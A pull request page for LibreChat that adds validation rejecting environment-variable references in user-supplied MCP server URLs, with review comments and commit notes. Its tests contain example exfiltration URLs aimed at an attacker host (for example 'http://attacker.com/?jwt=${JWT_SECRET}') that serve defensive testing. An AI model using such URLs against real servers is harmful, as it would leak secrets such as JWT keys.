🔏 fix: MCP Server URL Schema Validation #12204
Merged
- Added tests to reject URLs containing environment variable references for SSE, streamable-http, and websocket types in the MCP routes.
- Introduced a new schema in the data provider to ensure user input URLs do not resolve environment variables, enhancing security against potential leaks.
- Updated existing MCP server user input schema to utilize the new validation logic, ensuring consistent handling of user-supplied URLs across the application.
Pull request overview
This PR tightens MCP server URL handling for user-provided configurations by preventing environment-variable template patterns from being accepted (mitigating potential secret exfiltration), and adds regression tests in both the data-provider and API route layers.
Changes:
- Add a `userUrlSchema` in `librechat-data-provider` that rejects URLs containing `${...}` patterns and enforces transport protocol constraints without env-var resolution.
- Update `MCPServerUserInputSchema` to use `userUrlSchema` for WebSocket/SSE/Streamable HTTP transports.
- Add Jest tests to ensure MCP routes reject configs whose URLs contain `${...}` references.
Reviewed changes
Copilot reviewed 3 out of 3 changed files in this pull request and generated 2 comments.
| File | Description |
|---|---|
| packages/data-provider/src/mcp.ts | Introduces env-var pattern rejection for user URL fields and applies it to the MCP user input schema. |
| packages/data-provider/specs/mcp.spec.ts | Adds unit tests around MCPServerUserInputSchema’s handling of ${...} in URLs. |
| api/server/routes/tests/mcp.spec.js | Adds route-level tests asserting POST/PATCH reject configs with ${...} in MCP URLs. |
Comment on lines +237 to +244
| const userUrlSchema = (protocolCheck: (val: string) => boolean, message: string) => | ||
| z | ||
| .string() | ||
| .refine((val) => !envVarPattern.test(val), { | ||
| message: 'Environment variable references are not allowed in URLs', | ||
| }) | ||
| .pipe(z.string().url()) | ||
| .refine(protocolCheck, { message }); |
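Review bot: the `envVarPattern` refine is placed ahead of `.pipe(z.string().url())`, so it runs on the raw string and its message cannot be pre-empted by the URL check; that ordering is the substance of the fix and deserves a one-line comment above `userUrlSchema`. Also confirm that `envVarPattern` is declared without the `g` or `y` flag: `RegExp.prototype.test` keeps `lastIndex` between calls on such a regex, so a stateful pattern would let some URLs through on alternate validations.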
Comment on lines +18 to +55
| it('should NOT resolve env variables in user-supplied SSE URLs', () => { | ||
| const result = MCPServerUserInputSchema.safeParse({ | ||
| type: 'sse', | ||
| url: 'http://attacker.com/?secret=${FAKE_SECRET}', | ||
| }); | ||
|
|
||
| if (result.success) { | ||
| expect(result.data.url).not.toContain('leaked-secret-value'); | ||
| } else { | ||
| expect(result.success).toBe(false); | ||
| } | ||
| }); | ||
|
|
||
| it('should NOT resolve env variables in user-supplied HTTP URLs', () => { | ||
| const result = MCPServerUserInputSchema.safeParse({ | ||
| type: 'streamable-http', | ||
| url: 'http://attacker.com/?jwt=${JWT_SECRET}', | ||
| }); | ||
|
|
||
| if (result.success) { | ||
| expect(result.data.url).not.toContain('super-secret-jwt'); | ||
| } else { | ||
| expect(result.success).toBe(false); | ||
| } | ||
| }); | ||
|
|
||
| it('should NOT resolve env variables in user-supplied WebSocket URLs', () => { | ||
| const result = MCPServerUserInputSchema.safeParse({ | ||
| type: 'websocket', | ||
| url: 'ws://attacker.com/?secret=${FAKE_SECRET}', | ||
| }); | ||
|
|
||
| if (result.success) { | ||
| expect(result.data.url).not.toContain('leaked-secret-value'); | ||
| } else { | ||
| expect(result.success).toBe(false); | ||
| } | ||
| }); |
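Review bot: the `if (result.success) … else …` branches in all three tests accept either outcome, so a schema that passed the literal `${FAKE_SECRET}` string through unchanged would still turn the suite green. Since `userUrlSchema` now rejects such URLs, assert `expect(result.success).toBe(false)` unconditionally and check the issue message (`'Environment variable references are not allowed in URLs'`) so a regression that silently starts accepting these inputs is caught.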
- Updated tests to ensure that URLs for SSE, streamable-http, and websocket types containing environment variable patterns are rejected, improving security against potential leaks.
- Refactored the MCP server user input schema to enforce stricter validation rules, preventing the resolution of environment variables in user-supplied URLs.
- Introduced new test cases for various URL types to validate the rejection logic, ensuring consistent handling across the application.
… handling
- Introduced new test cases to validate the prevention of environment variable exfiltration through user input URLs in the MCPServerUserInputSchema.
- Updated existing tests to confirm that URLs containing environment variable patterns are correctly resolved or rejected, improving security against potential leaks.
- Refactored test structure to better organize environment variable handling scenarios, ensuring comprehensive coverage of edge cases.
jcbartle pushed a commit to jcbartle/LibreChat that referenced this pull request on May 11, 2026:
* fix: MCP server configuration validation and schema
  - Added tests to reject URLs containing environment variable references for SSE, streamable-http, and websocket types in the MCP routes.
  - Introduced a new schema in the data provider to ensure user input URLs do not resolve environment variables, enhancing security against potential leaks.
  - Updated existing MCP server user input schema to utilize the new validation logic, ensuring consistent handling of user-supplied URLs across the application.
* fix: MCP URL validation to reject env variable references
  - Updated tests to ensure that URLs for SSE, streamable-http, and websocket types containing environment variable patterns are rejected, improving security against potential leaks.
  - Refactored the MCP server user input schema to enforce stricter validation rules, preventing the resolution of environment variables in user-supplied URLs.
  - Introduced new test cases for various URL types to validate the rejection logic, ensuring consistent handling across the application.
* test: Enhance MCPServerUserInputSchema tests for environment variable handling
  - Introduced new test cases to validate the prevention of environment variable exfiltration through user input URLs in the MCPServerUserInputSchema.
  - Updated existing tests to confirm that URLs containing environment variable patterns are correctly resolved or rejected, improving security against potential leaks.
  - Refactored test structure to better organize environment variable handling scenarios, ensuring comprehensive coverage of edge cases.